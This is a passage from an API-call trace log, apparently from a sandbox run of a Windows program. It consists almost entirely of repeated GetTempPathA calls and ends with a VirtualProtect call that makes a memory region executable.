lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.635] VirtualProtect (in: lpAddress=0x1534b8, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0096.636] GetProcessAffinityMask (in: hProcess=0x0, 